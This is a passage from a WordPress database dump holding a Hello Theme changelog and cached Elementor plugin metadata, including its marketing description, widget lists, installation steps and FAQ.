button<\\/li>\\n <li>Fix: The header renders redundant <code><p><\\/code> when tagline is empty<\\/li>\\n <li>Fix: Single post renders redundant wrapping <code><div><\\/code> when it has no tags<\\/li>\\n <li>Fix: Remove redundant wrapping <code><div><\\/code> from <code>wp_nav_menu()<\\/code> output<\\/li>\\n <li>Fix: Wrap page <code><h1><\\/code> with <code><div><\\/code>, not <code><header><\\/code><\\/li>\\n <li>Fix: Use consistent <code><h3><\\/code> for comments title and comment form<\\/li>\\n <li>Fix: Remove heading tags from dynamic header\\/footer<\\/li>\\n <li>\\n Fix: Mobile Menu hamburger is not visible for logged-out users in some cases\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/369\\\" target=\\\"_blank\\\">#369<\\/a>)\\n <\\/li>\\n <li>Fix: Remove duplicate ID attributes in the header mobile menu<\\/li>\\n <li>\\n Fix: Remove redundant table styles\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/311\\\" target=\\\"_blank\\\">#311<\\/a>)\\n <\\/li>\\n <li>Fix: Remove redundant space below Site Logo in the header\\/footer<\\/li>\\n <li>Fix: Remove redundant CSS from dynamic header\\/footer layout<\\/li>\\n <li>\\n Fix: Separate post tags in single post\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/304\\\" target=\\\"_blank\\\">#304<\\/a>)\\n <\\/li>\\n <li>Fix: Display <code>the_tags()<\\/code> after <code>wp_link_pages()<\\/code><\\/li>\\n <li>Fix: Remove page break navigation from archives when using <code><!--nextpage--><\\/code><\\/li>\\n <li>Fix: Style posts pagination component layout<\\/li>\\n <li>Fix: Add RTL support to pagination arrows in archive pages<\\/li>\\n <li>\\n Fix: Update pagination prev\\/next labels and positions\\n (<a href=\\\"https:\\/\\/github.com\\/elementor\\/hello-theme\\/issues\\/404\\\" target=\\\"_blank\\\">#404<\\/a>)\\n <\\/li>\\n <li>Fix: Check if Elementor is loaded when using dynamic header & footer<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.0.2\",\"title\":\"3.0.2 - 2024-05-28\",\"description\":\"\\n <ul>\\n <li>Internal: Version bump release to refresh WordPress repository<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.0.1\",\"title\":\"3.0.1 - 2024-01-24\",\"description\":\"\\n <ul>\\n <li>Fix: Harden security for admin notice dismiss button<\\/li>\\n <li>Fix: Add <code>alt<\\/code> attribute to all the images in the dashboard<\\/li>\\n <\\/ul>\"},{\"id\":\"hello-theme-3.0.0\",\"title\":\"3.0.0 - 2023-12-26\",\"description\":\"\\n <ul>\\n <li>New: Option to disable cross-site header & footer<\\/li>\\n <li>Tweak: Update <code>Requires PHP 7.3<\\/code><\\/li>\\n <li>Tweak: Update <code>Tested up to 6.4<\\/code><\\/li>\\n <li>Tweak: Move cross-site header & footer styles to a separate CSS file<\\/li>\\n <li>Tweak: Don\'t load <code>header-footer.min.css<\\/code> when disabling header & footer<\\/li>\\n <li>Tweak: Don\'t load <code>hello-frontend.min.js<\\/code> when disabling header & footer<\\/li>\\n <li>Tweak: Replace jQuery code with vanilla JS in the frontend<\\/li>\\n <li>Tweak: Replace jQuery code with vanilla JS in WordPress admin<\\/li>\\n <li>Tweak: Remove unused JS code from the frontend<\\/li>\\n <li>Tweak: Remove unused CSS code from the editor<\\/li>\\n <li>Tweak: Remove unnecessary <code>role<\\/code> attributes from HTML landmark elements<\\/li>\\n <li>Tweak: Link from Elementor Site Settings to Hello Theme Settings<\\/li>\\n <li>Fix: Dynamic script version for better caching<\\/li>\\n <\\/ul>\"}]\";}','off'),(947,'finished_updating_comment_type','1','auto'),(950,'_site_transient_wp_plugin_dependencies_plugin_data','a:1:{s:9:\"elementor\";a:35:{s:4:\"name\";s:63:\"Elementor Website Builder – More Than Just a Page Builder\";s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:6:\"3.35.5\";s:6:\"author\";s:64:\"<a href=\"https://profiles.wordpress.org/elemntor/\">Elementor</a>\";s:14:\"author_profile\";s:40:\"https://profiles.wordpress.org/elemntor/\";s:12:\"contributors\";a:1:{s:8:\"elemntor\";a:3:{s:7:\"profile\";s:40:\"https://profiles.wordpress.org/elemntor/\";s:6:\"avatar\";s:120:\"https://secure.gravatar.com/avatar/7d70f15d78757f876d1847a8f87dd93e1d9c168264b4aeeaf72058656690d05b?s=96&d=monsterid&r=g\";s:12:\"display_name\";s:9:\"Elementor\";}}s:8:\"requires\";s:3:\"6.6\";s:6:\"tested\";s:5:\"6.9.1\";s:12:\"requires_php\";s:3:\"7.4\";s:16:\"requires_plugins\";a:0:{}s:6:\"rating\";i:90;s:7:\"ratings\";a:5:{i:5;i:6105;i:4;i:218;i:3;i:113;i:2;i:107;i:1;i:647;}s:11:\"num_ratings\";i:7190;s:11:\"support_url\";s:47:\"https://wordpress.org/support/plugin/elementor/\";s:15:\"support_threads\";i:83;s:24:\"support_threads_resolved\";i:67;s:15:\"active_installs\";i:10000000;s:12:\"last_updated\";s:21:\"2026-02-17 2:42pm GMT\";s:5:\"added\";s:10:\"2016-05-30\";s:8:\"homepage\";s:87:\"https://elementor.com/?utm_source=wp-plugins&utm_campaign=plugin-uri&utm_medium=wp-dash\";s:8:\"sections\";a:6:{s:11:\"description\";s:25408:\"<p><iframe loading=\"lazy\" title=\"This is Elementor | The complete website building experience for WordPress\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/ROEC0CPRO3w?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe></p>\n<h4>THE #1 NO CODE DRAG & DROP WORDPRESS WEBSITE BUILDER POWERING 20M+ WEBSITES WORLDWIDE, NOW WITH AI.</h4>\n<p>Elementor, the leading WordPress website creation platform, empowers you to build professional, pixel-perfect websites seamlessly with its no-code, drag-and-drop Editor.</p>\n<p>Supporting the full website lifecycle, Elementor enables you to confidently build, optimize, and manage your website with extended capabilities such as AI-powered creation, image optimization, transactional email delivery, accessibility tools, performance boosters, and more.</p>\n<p>Unlock all features with <strong><a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-pro-pro-features/\" rel=\"nofollow ugc\">Elementor One</a></strong>.</p>\n<p>Need fast and secure cloud hosting for your Elementor site? Try out <strong><a href=\"https://elemn.to/repo-hosting\" rel=\"nofollow ugc\">Elementor Host</a></strong> Powered by Google Cloud & Cloudflare. 4.9/5 TrustPilot score.</p>\n<h3>🌟 Create Professional Stunning Websites</h3>\n<ul>\n<li><strong><a href=\"https://go.elementor.com/feature-page-editor/\" rel=\"nofollow ugc\">Intuitive Drag & Drop Builder</a></strong>: Build any website with our no-code, drag-and-drop Editor. Achieve design precision with full control over layout and style.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-feature-page/\" rel=\"nofollow ugc\">Pixel-Perfect Design Tools</a></strong>: Upload SVGs, apply masks, gradients, box shadows, headline effects, shape dividers, and use built-in CSS controls for advanced customization.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-library-full-website-kit/\" rel=\"nofollow ugc\">Template Library</a></strong>: Apply complete website kits for instant setups, or choose from a vast library of single pages, blocks, and pop-up templates.</li>\n<li><strong><a href=\"https://go.elementor.com/feature-page-editor/\" rel=\"nofollow ugc\">Advanced Widgets</a></strong>: Access over 40 FREE widgets, including heading, image, text editor, video, button, gallery, carousels, and more.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-ai/\" rel=\"nofollow ugc\">AI Capabilities</a></strong>: Revolutionize your design and content creation process with native AI integration. Instantly create sections, text, code, and images.</li>\n</ul>\n<h4>🗝️ Key features:</h4>\n<ul>\n<li><strong><a href=\"https://go.elementor.com/feature-page-global-settings/\" rel=\"nofollow ugc\">Design System</a></strong>: Use Elementor’s Design System for consistent colors, typography, and design elements, ensuring a cohesive, professional look.</li>\n<li><strong><a href=\"https://go.elementor.com/feature-page-responsive-design/\" rel=\"nofollow ugc\">Responsive Design</a></strong>: Optimize your design for every device with custom breakpoints, ensuring a seamless desktop, tablet, and mobile experience.</li>\n<li><strong>Mask Shapes</strong>: Turning any element, like an image or video, into whatever shape you desire to create standout designs.</li>\n<li><strong>CSS Transform</strong>: Use CSS Transform to rotate, scale, and skew elements, adding dynamic styling to your site.</li>\n<li><strong>Entrance Animations</strong>: Add entrance animations to elements to create engaging and interactive user experiences.</li>\n<li><strong><a href=\"https://elementor.com/features/#SaveBackup\" rel=\"nofollow ugc\">Revision History</a></strong>: Elementor’s Revision History feature enables users to track and revert to previous versions of their designs, providing peace of mind and flexibility during the creative process.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-developers-developers-website/\" rel=\"nofollow ugc\">Developer-Friendly</a></strong>: Equipped with extensive documentation, API, developer tools, and custom code areas, Elementor offers a conducive environment for developers to extend its capabilities and create custom solutions.</li>\n<li><strong><a href=\"https://elementor.com/features/contact-button/\" rel=\"nofollow ugc\">Floating Buttons</a></strong>: Enhance user interaction with customizable, floating action buttons that stay in view as users scroll.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-industry-leading-theme-builder/\" rel=\"nofollow ugc\">Theme Builder</a> [Pro]</strong>: Design every part of your site—headers, footers, posts, and archives—for complete control over appearance.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-popup-builder/\" rel=\"nofollow ugc\">Popup Builder</a> [Pro]</strong>: Create eye-catching popups with Elementor’s Popup Builder, equipped with advanced targeting and triggering options to optimize user engagement and conversions.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-professional-form-builder-and-submission-log/\" rel=\"nofollow ugc\">Forms</a> [Pro]</strong>: Design and integrate custom forms, utilizing advanced features and integrations to capture and manage submissions effectively.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-woocommerce-builder/\" rel=\"nofollow ugc\">WooCommerce Builder</a> [Pro]</strong>: Integrate Elementor with WooCommerce to design custom product pages, shop layouts, archives, carts, checkout pages, my account, and more, enhancing your store’s visual appeal and functionality.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-dynamic-content/\" rel=\"nofollow ugc\">Dynamic Content</a> [Pro]</strong>: Leverage dynamic content capabilities to create personalized and interactive web experiences by connecting your designs to various data sources.</li>\n<li><strong><a href=\"https://go.elementor.com/features-page-notes/\" rel=\"nofollow ugc\">Notes</a> [Pro]</strong>: Enhance team collaboration by using Elementor’s Notes feature to leave feedback and comments directly on the design interface.</li>\n<li><strong>Custom Code [Pro]</strong>: Insert custom code to extend the functionality of your site, offering flexibility for advanced customizations.</li>\n<li><strong>Custom CSS [Pro]</strong>: Apply Custom CSS to fine-tune the styling of elements, ensuring precise control over the design aspects.</li>\n<li><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-pro-features-motion-effects/\" rel=\"nofollow ugc\">Motion Effects</a> [Pro]</strong>: Add advanced motion effects to elements for a more dynamic and engaging user experience.</li>\n<li><strong>Custom Fonts & Icons [Pro]</strong>: Upload and use custom fonts and icons to match your brand’s identity.</li>\n</ul>\n<h4>😍 Elementor FREE widgets</h4>\n<p>Unlock the potential of Elementor with our comprehensive suite of free widgets and tools, designed to empower your website creation process and elevate your design capabilities:</p>\n<ul>\n<li><strong>Heading</strong>. Add eye-catching headlines.</li>\n<li><strong>Image</strong>. Control the size, opacity and more.</li>\n<li><strong>Text Editor</strong>. Just like the WordPress text editor.</li>\n<li><strong>Video</strong>. Add YouTube, Vimeo, VideoPress, Dailymotion or self-hosted videos.</li>\n<li><strong>Button</strong>. Create interactive buttons.</li>\n<li><strong>Link in Bio</strong>. Build link in bio components to promote your business / services.</li>\n<li><strong>Image Box</strong>. A box with image, headline and text.</li>\n<li><strong>Testimonials</strong>. Customer testimonials.</li>\n<li><strong>Icon</strong>. Place one or more of 600+ icons available.</li>\n<li><strong>Icon Box</strong>. An icon, headline, and text with one widget.</li>\n<li><strong>Social Icons</strong>. Link to your social pages with the Facebook/X (formerly Twitter) icons.</li>\n<li><strong>Image Gallery</strong>. Display your images in a grid.</li>\n<li><strong>Image Carousel</strong>. Create rotating carousels or sliders for chosen images.</li>\n<li><strong>Icon List</strong>. Use any icon to create a bullet list.</li>\n<li><strong>Counter</strong>. Show numbers in an escalating manner.</li>\n<li><strong>Progress Bar</strong>. Include an escalating progress bar.</li>\n<li><strong>Nested Tabs</strong>. Display content in vertical or horizontal tabs.</li>\n<li><strong>Nested Accordion</strong>. Display any type of content in collapsible sections.</li>\n<li><strong>Rating</strong>. Display how many stars (or another icon) other visitors gave.</li>\n<li><strong>Alert</strong>. Include a colored alert box to draw visitor’s attention.</li>\n<li><strong>HTML</strong>. Insert code into the page.</li>\n<li><strong>Shortcode</strong>. Insert shortcodes from any plugin into the page.</li>\n<li><strong>Menu Anchor</strong>. Link any menu to this anchor.</li>\n<li><strong>Read More</strong>. Set the Read More cut-off for the excerpt in archive pages.</li>\n<li><strong>Sidebar</strong>. Add sidebars onto the page.</li>\n<li><strong>Google Maps</strong>. Embed maps into the page.</li>\n<li><strong>SoundCloud</strong>. Add SoundCloud audio bits.</li>\n<li><strong>Divider</strong>. Separate content with a designed divider.</li>\n<li><strong>Spacer</strong>. Add space between elements.</li>\n<li><strong>Text Path</strong>. Attach your text to a path.</li>\n<li><strong>And counting…</strong></li>\n</ul>\n<h3>🚀 Enhance Your Website</h3>\n<p><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-performance-performance-page/\" rel=\"nofollow ugc\">High-Performing Websites</a></strong>: Website performance impacts your visitor’s experience and search result ranking. Elementor, in partnership with Google Chrome, continuously enhances performance without compromising design.</p>\n<p><strong>Key features include:</strong></p>\n<ul>\n<li><strong>Reduced DOM Output</strong>: Streamlined HTML structure for faster rendering.</li>\n<li><strong>Improved Media File Loading</strong>: Optimized loading of images, videos, and other media assets.</li>\n<li><strong>Reduced CSS and JS Files</strong>: Minimized stylesheets and scripts individually loaded only on demand for quicker loading times.</li>\n<li><strong>Lazy Loading</strong>: Deferred loading of non-critical resources to improve initial page load speed.</li>\n<li><strong>Faster Font Loading</strong>: Efficient delivery of web fonts to enhance text rendering speed.</li>\n<li><strong>Optimized Front-End Asset Loading</strong>: Efficient loading of assets like JavaScript and CSS to minimize render-blocking.</li>\n<li><strong>Element Caching</strong>: Cache frequently accessed design elements to reduce server response time and enhance overall performance.</li>\n</ul>\n<h3>🔥 Elementor Editor Pro Features</h3>\n<p>Create unparalleled websites while saving time, money and resources with <a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-pro-elementor-pro/\" rel=\"nofollow ugc\">Elementor Editor Pro</a>’s full website builder. Get access to 100+ professional widgets, features, and tools.</p>\n<p><strong>Editor Pro Design Widgets:</strong></p>\n<ol>\n<li><strong>Posts</strong>: Display your blog posts with customizable layouts and styles.</li>\n<li><strong>Share Buttons</strong>: Allow visitors to easily share your content on various social media platforms.</li>\n<li><strong>Portfolio</strong>: Showcase your work or projects with stunning portfolio layouts.</li>\n<li><strong>Slides</strong>: Create dynamic slideshows with custom animations and transitions.</li>\n<li><strong>Form</strong>: Design and customize advanced forms for user interaction and data collection.</li>\n<li><strong>Login</strong>: Add a login form or user registration module to your website.</li>\n<li><strong>Nav Menu</strong>: Customize and style your website’s navigation menu for better user experience.</li>\n<li><strong>Animated Headline</strong>: Create attention-grabbing headlines with animated effects.</li>\n<li><strong>Price Table</strong>: Display pricing plans or packages in a structured and visually appealing format.</li>\n<li><strong>Price List</strong>: Showcase a list of prices or services with customizable styling options.</li>\n<li><strong>Gallery</strong>: Create beautiful image galleries with various layout options and lightbox support.</li>\n<li><strong>Flip Box</strong>: Add interactive flip animations to highlight content or features.</li>\n<li><strong>Call to Action</strong>: Encourage user interaction and conversions with compelling call-to-action sections.</li>\n<li><strong>Media Carousel</strong>: Showcase a carousel of media files such as images or videos.</li>\n<li><strong>Testimonial Carousel</strong>: Display client testimonials in a carousel format for social proof.</li>\n<li><strong>Nested Carousel</strong>: Create nested carousels for more complex content organization.</li>\n<li><strong>Loop Carousel</strong>: Display content in a looped carousel for continuous viewing.</li>\n<li><strong>Table Of Content</strong>: Generate a table of contents for longer articles or guides to improve navigation.</li>\n<li><strong>Countdown</strong>: Add countdown timers to create urgency for promotions or events.</li>\n<li><strong>Facebook Page</strong>: Embed your Facebook page feed or content onto your website.</li>\n<li><strong>Blockquote</strong>: Highlight quotes or testimonials with stylish formatting options.</li>\n<li><strong>Template</strong>: Save and reuse design templates for consistent branding and layout.</li>\n<li><strong>Reviews</strong>: Showcase customer reviews and ratings to build trust and credibility.</li>\n<li><strong>Facebook Button</strong>: Add buttons to promote interactions with your Facebook page or content.</li>\n<li><strong>Facebook Embed</strong>: Embed Facebook posts or content onto your website.</li>\n<li><strong>Facebook Comments</strong>: Enable Facebook comments on your website’s pages or posts.</li>\n<li><strong>PayPal Button</strong>: Integrate PayPal buttons for easy online payments.</li>\n<li><strong>Stripe Button</strong>: Integrate Stripe payment buttons to facilitate secure online transactions.</li>\n<li><strong>Lottie Widget</strong>: Add Lottie animations to enhance visual appeal and engagement.</li>\n<li><strong>Code Highlight</strong>: Display code snippets with syntax highlighting for better readability.</li>\n<li><strong>Video Playlist</strong>: Create and customize playlists for video content on your website.</li>\n<li><strong>Mega Menu</strong>: Customize advanced menus for better navigation and displaying complex content.</li>\n<li><strong>Off Canvas</strong>: Create off-canvas areas that slide in to show extra info or menus without cluttering the main layout.</li>\n</ol>\n<p><strong>Editor Pro Theme Widgets:</strong></p>\n<p>Build and customize all the key parts of your website including headers, footers, 404 page, global archives, and more…</p>\n<ol>\n<li><strong>Post Title</strong>: Customize the title of individual blog posts or pages.</li>\n<li><strong>Post Excerpt</strong>: Display a brief summary or teaser of your blog posts.</li>\n<li><strong>Post Content</strong>: Customize the main content area of your blog posts or pages.</li>\n<li><strong>Featured Image</strong>: Set and customize featured images for blog posts or pages.</li>\n<li><strong>Author Box</strong>: Display author information and bios on blog posts.</li>\n<li><strong>Post Comments</strong>: Customize the appearance and functionality of comments sections on your website.</li>\n<li><strong>Post Navigation</strong>: Add navigation links to adjacent posts for easy browsing.</li>\n<li><strong>Post Info</strong>: Display additional information about blog posts, such as author and date.</li>\n<li><strong>Site Logo</strong>: Upload and customize your website’s logo for branding purposes.</li>\n<li><strong>Site Title</strong>: Customize the title of your website.</li>\n<li><strong>Page Title</strong>: Customize the title of individual pages.</li>\n<li><strong>Search Bar</strong>: Add a search bar to allow users to search your website’s content.</li>\n<li><strong>Breadcrumbs</strong>: Display hierarchical navigation paths for better user navigation.</li>\n<li><strong>Sitemap</strong>: Generate a sitemap for better search engine indexing and user navigation.</li>\n<li><strong>Loop Grid</strong>: Design and customize grid layouts for blog post archives or product listings.</li>\n</ol>\n<p><strong>Editor Pro WooCommerce Widgets:</strong></p>\n<p>Design and customize a complete online shopping experience across your entire website.</p>\n<ol>\n<li><strong>Product</strong>: Display individual products with customizable layouts and styles.</li>\n<li><strong>Breadcrumbs</strong>: Display hierarchical navigation paths for better user navigation within your store.</li>\n<li><strong>Product Title</strong>: Customize the title of individual products.</li>\n<li><strong>Product Images</strong>: Set and customize images for product listings.</li>\n<li><strong>Product Price</strong>: Display the price of individual products.</li>\n<li><strong>Add To Cart</strong>: Add customizable add to cart buttons for easy purchasing.</li>\n<li><strong>Product Rating</strong>: Display ratings and reviews for products.</li>\n<li><strong>Product Stock</strong>: Display stock availability for products.</li>\n<li><strong>Product Meta</strong>: Display additional information about products, such as SKU and categories.</li>\n<li><strong>Product Content</strong>: Customize the main content area of product descriptions.</li>\n<li><strong>Short Description</strong>: Display brief summaries or teasers of products.</li>\n<li><strong>Product Data Tabs</strong>: Organize product information into tabbed sections for better organization.</li>\n<li><strong>Additional Information</strong>: Display additional details about products, such as dimensions and weight.</li>\n<li><strong>Product Related</strong>: Showcase related products to encourage additional purchases.</li>\n<li><strong>Upsells</strong>: Promote upsell products to increase average order value.</li>\n<li><strong>Products</strong>: Display a grid or list of products with customizable settings.</li>\n<li><strong>Custom Add To Cart</strong>: Customize the add to cart button for specific products.</li>\n<li><strong>WooCommerce Pages</strong>: Design and customize WooCommerce-specific pages, such as the cart and checkout pages.</li>\n<li><strong>Product Categories</strong>: Display product categories for easy navigation within your store.</li>\n<li><strong>Menu Cart</strong>: Display a cart icon in your navigation menu for easy access to the shopping cart.</li>\n<li><strong>Cart</strong>: Customize the appearance and functionality of the shopping cart page.</li>\n<li><strong>Checkout</strong>: Customize the appearance and functionality of the checkout page.</li>\n<li><strong>My Account</strong>: Customize the appearance and functionality of the customer account area.</li>\n<li><strong>Purchase Summary</strong>: Display a summary of purchases during the checkout process.</li>\n<li><strong>WooCommerce Notices</strong>: Customize the appearance and functionality of WooCommerce notices, such as order confirmation messages.</li>\n</ol>\n<p>Build professional websites with <strong><a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-pro-elementor-pro/\" rel=\"nofollow ugc\">Elementor Editor Pro</a></strong>!</p>\n<h4>🔒 SECURITY AND COMPLIANCE</h4>\n<p>Elementor places a paramount focus on security, evident through our acquisition of industry certifications such as ISO/IEC 27001, ISO/IEC 27017, ISO/IEC 27018, ISO/IEC 27701, and SOC 2 Type II. These certifications underscore our commitment to implementing robust security measures, and highlight our dedication to adhering to recognized industry standards.</p>\n<p>We encourage ethical security research through our <a href=\"https://go.elementor.com/wp-repo-description-tab-bug-crowd-bug-bounty-program/\" rel=\"nofollow ugc\">Bug Bounty program</a>. We collaborate with leading bug bounty services to provide opportunities for researchers to report vulnerabilities in our services. Our bounty programs include a triage team available 24/7/365.</p>\n<p>For more information: <a href=\"https://go.elementor.com/trust-center/\" rel=\"nofollow ugc\">Trust Center</a>.</p>\n<h4>♿ Accessibility Best Practices</h4>\n<p>Elementor offers accessibility tools and enhancements to help you provide a better experience for all users. Including HTML 5 semantic, full keyboard navigation menu, ongoing improvement of features, widget, and more.</p>\n<h4>🌐 Translated to 63+ languages, includes RTL support</h4>\n<p>Elementor supports multiple languages, typographies, and RTL, with editor translations in <a href=\"https://go.elementor.com/wp-repo-description-tab-wordpress-plugin-translate/\" rel=\"nofollow ugc\">over 63 languages</a>.</p>\n<p>It’s also compatible with WPML, Polylang, TranslatePress, Weglot, and more. To contribute, add a new language via <a href=\"https://translate.wordpress.org\" rel=\"nofollow ugc\">translate.wordpress.org</a>. See our guide on <a href=\"https://go.elementor.com/wp-repo-description-tab-help-center-translate/\" rel=\"nofollow ugc\">how to translate and localize the plugin</a>.</p>\n<h4>⏩ Use of 3rd Party Services</h4>\n<p>To improve the user experience, Elementor may use the following 3rd party services if the required feature is enabled:</p>\n<ul>\n<li>Google Fonts – are loaded to add additional fonts to your website. Google’s <a href=\"https://policies.google.com/terms\" rel=\"nofollow ugc\">TOS</a> and <a href=\"https://policies.google.com/privacy\" rel=\"nofollow ugc\">Privacy Policy</a> apply.</li>\n<li>Some Elementor features require loading assets from Elementor.com. These assets are not used for tracking unless explicitly mentioned, requiring your approval and manual opt-in. Learn more in our <a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-plugin-terms/\" rel=\"nofollow ugc\">TOS</a> and <a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-plugin-privacy/\" rel=\"nofollow ugc\">Privacy Policy</a>.</li>\n</ul>\n<h4>📧 Related Products by Elementor</h4>\n<p><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-io/\" rel=\"nofollow ugc\">Image Optimizer</a></strong>: Superior image compression for faster, high-quality website performance.</p>\n<p><strong><a href=\"https://go.elementor.com/wp-repo-description-tab-elementor-sm/\" rel=\"nofollow ugc\">Site Mailer</a></strong>: Reliable email management without SMTP plugins, keeping your communications streamlined and efficient.</p>\n<p><strong><a href=\"http://go.elementor.com/editor-acc-wp-repo\" rel=\"nofollow ugc\">Ally</a></strong>: Enhances website usability for individuals with disabilities. Ally is designed to help web creators make their websites more inclusive. It scans, detects, and remediate key accessibility violations, working seamlessly on all WordPress and Elementor websites.</p>\n<h4>📣 See What Our Users Have to Say</h4>\n<blockquote>\n<p>“Elementor is hands down the best page builder out there” – ★★★★★ <em><a href=\"https://wordpress.org/support/topic/elementor-is-hands-down-the-best-page-builder-out-there/\" rel=\"ugc\">Graphicvision1</a></em></p>\n<p>“An incredibly user-friendly plugin” – ★★★★★ <em><a href=\"https://wordpress.org/support/topic/a-wonderful-experience/\" rel=\"ugc\">Hyeyoga</a></em></p>\n<p>“Easily, my most used WP plugin” – ★★★★★ <em><a href=\"https://wordpress.org/support/topic/easily-my-most-used-wp-plugin/\" rel=\"ugc\">Xander Venske</a></em></p>\n<p>“I upgraded to the Pro version and just love this plugin!” – ★★★★★ <em><a href=\"https://wordpress.org/support/topic/love-elementor-17/\" rel=\"ugc\">Andybarn56</a></em></p>\n<p>“Excellent product with great tech support” – ★★★★★ <em><a href=\"https://wordpress.org/support/topic/excellent-product-with-great-tech-support/\" rel=\"ugc\">Martywilsonnj</a></em></p>\n</blockquote>\n<p><em><a href=\"https://wordpress.org/support/plugin/elementor/reviews/?filter=5\" rel=\"ugc\">More testimonials</a></em></p>\n<h4>🌍 Join a Global Community</h4>\n<p>Join a global community that helps each other achieve their goals.</p>\n<ul>\n<li><a href=\"https://elemn.to/discord\" rel=\"nofollow ugc\">Discord Community</a> – Chat with Web Creators, discuss specific topics in dedicated channels.</li>\n<li><a href=\"https://go.elementor.com/wp-repo-description-tab-facebook-group/\" rel=\"nofollow ugc\">Facebook Community</a> – Over 150K+ members, offering support, advice, feedback, and tutorials.</li>\n<li><a href=\"https://go.elementor.com/wp-repo-description-tab-github-repo/\" rel=\"nofollow ugc\">GitHub Community</a> – Get information about releases, request features, or report a bug.</li>\n<li><a href=\"https://go.elementor.com/wp-repo-description-tab-addons-dozens-of-elementor-addons/\" rel=\"nofollow ugc\">Elementor Addons, Themes, and Kits</a> Themes and Kits …</li>\n</ul>\n\";s:12:\"installation\";s:1461:\"<h4>Minimum Requirements</h4>\n<ul>\n<li>WordPress 6.5 or greater</li>\n<li>PHP version 7.4 or greater</li>\n<li>MySQL version 5.0 or greater</li>\n</ul>\n<h4>Recommended Requirements</h4>\n<ul>\n<li>PHP version 8.1 or greater</li>\n<li>MySQL version 5.6 or greater</li>\n<li>WordPress Memory limit of 64 MB or greater (128 MB or higher is preferred)</li>\n</ul>\n<p><iframe loading=\"lazy\" title=\"Installing Elementor on WordPress\" width=\"750\" height=\"422\" src=\"https://www.youtube.com/embed/9EZ159ryFNs?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen></iframe></p>\n<h4>Installation</h4>\n<ol>\n<li>Install using the WordPress built-in Plugin installer, or Extract the zip file and drop the contents in the <code>wp-content/plugins/</code> directory of your WordPress installation.</li>\n<li>Activate the plugin through the ‘Plugins’ menu in WordPress.</li>\n<li>Go to Pages > Add New</li>\n<li>Press the ‘Edit with Elementor’ button.</li>\n<li>Now you can drag and drop widgets from the left panel onto the content area, as well as add new sections and columns that make up the page structure.</li>\n</ol>\n<p>For documentation and tutorials visit our <a href=\"https://elementor.com/help/?utm_source=wp-repo&utm_medium=link&utm_campaign=readme\" rel=\"nofollow ugc\">Knowledge Base</a>.</p>\n\";s:3:\"faq\";s:5070:\"\n<dt id=\"how%20do%20i%20install%20elementor%20editor%3F\">\nHow do I install Elementor Editor?\n</h4>\n<p>\n<p>To install the free version of Elementor Editor, follow the steps below:<br />\nFrom your WordPress dashboard -> Go to Plugins -> Click on ‘Add new’-> In the Search field, enter Elementor and choose Elementor website builder.<br />\nPress install -> After installation, click Activate.</p>\n</p>\n<dt id=\"does%20elementor%20editor%20work%20with%20all%20the%20themes%3F\">\nDoes Elementor Editor work with all the themes?\n</h4>\n<p>\n<p>Elementor Editor works all the themes that respect the coding standards of WordPress set by its Codex. It is recommended to use Elementor’s <a href=\"https://go.elementor.com/wp-repo-description-tab-hello-theme-hello-theme/\" rel=\"nofollow ugc\">Hello Theme</a>, a lightweight blank canvas, to enjoy full flexibility when using Elementor Editor, and optimize your experience.</p>\n</p>\n<dt id=\"is%20elementor%20editor%20compatible%20with%20gutenberg%3F\">\nIs Elementor Editor compatible with Gutenberg?\n</h4>\n<p>\n<p>Elementor Editor and Gutenberg work seamlessly together. As a user, you can easily decide which editor to use at every point while editing your site.</p>\n</p>\n<dt id=\"can%20i%20create%20an%20online%20store%3F\">\nCan I create an online store?\n</h4>\n<p>\n<p>Yes, with the Elementor Editor Pro WooCommerce Builder you can customize every page of your store to create an amazing customer experience that drives sales.</p>\n</p>\n<dt id=\"does%20it%20work%20with%20other%20wordpress%20plugins%3F\">\nDoes it work with other WordPress plugins?\n</h4>\n<p>\n<p>It works with almost all the plugins. If you experience an incompatibility issue, please report it to us and to the plugin that conflicts with Elementor Editor.</p>\n</p>\n<dt id=\"do%20i%20need%20to%20know%20how%20to%20code%3F\">\nDo I need to know how to code?\n</h4>\n<p>\n<p>No! Elementor Editor provides you with all the widgets and features that you need to build a professional website without using code.</p>\n</p>\n<dt id=\"do%20i%20need%20to%20know%20how%20to%20design%3F\">\nDo I need to know how to design?\n</h4>\n<p>\n<p>No, you can choose between professionally designed kits and templates that fit to every industry and have all you need to create your own professional website.</p>\n</p>\n<dt id=\"will%20elementor%20editor%20slow%20down%20my%20website%3F\">\nWill Elementor Editor slow down my website?\n</h4>\n<p>\n<p>As Elementor prioritizes speed and performance, you enjoy better and faster performance with each new version of the Editor. When testing the same page layout on older versions you can see a significant performance improvement, from a score of 82 